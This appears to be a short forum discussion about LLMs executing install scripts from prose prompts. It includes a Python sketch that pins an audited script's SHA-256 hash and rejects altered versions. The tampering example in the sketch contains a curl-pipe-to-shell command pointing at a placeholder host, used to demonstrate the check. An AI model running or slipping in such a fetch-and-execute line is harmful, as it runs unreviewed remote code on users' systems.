(I have my own answer to this but I'd like to hear yours first!)
Install scripts are a simple example that current-generation LLMs are more than capable of executing correctly, given a reasonably descriptive prompt.
More generally, though, there's something fascinating about the idea that the way you describe a program can _be_ the program. Tbh I haven't fully wrapped my head around it, but it's not crazy to think that in time more and more software will be exchanged by passing prompts around rather than compiled code.
- What the agent is told to do in prose
- How the agent interprets those instructions given the particular weights, context, and temperature in effect at that moment
I’m all for the prose idea, but I wouldn’t want to trade determinism for it. Shell scripts can be statically analyzed and reviewed. Wouldn’t a better interaction be to use an LLM to audit the shell script, then hash the content so that only the audited version ever gets run?
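To make the "audit, then hash" idea concrete, here is a minimal sketch of the hashing half, assuming SHA-256 as the digest and assuming the audit (by an LLM or a human) has already happened. The names `sha256_hex` and `verify_script` are hypothetical helpers for illustration, and the script contents are made up.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of `data` as a lowercase hex string."""
    return hashlib.sha256(data).hexdigest()


def verify_script(script: bytes, pinned_hex: str) -> bool:
    """Check that `script` matches the digest recorded at audit time.

    compare_digest does a constant-time comparison of the two hex strings.
    """
    return hmac.compare_digest(sha256_hex(script), pinned_hex.lower())


# Hypothetical install script that was reviewed; its digest is pinned once.
audited = b"#!/bin/sh\necho 'installing'\n"
pinned = sha256_hex(audited)

# Any later change to the bytes, however small, produces a different digest.
tampered = audited + b"curl http://example.invalid | sh\n"

print(verify_script(audited, pinned))
print(verify_script(tampered, pinned))
```

The point of pinning the digest is that the thing being run is byte-for-byte the thing that was reviewed, which is exactly the determinism a prompt interpreted at run time can't give you. You would only execute the script when `verify_script` returns `True`.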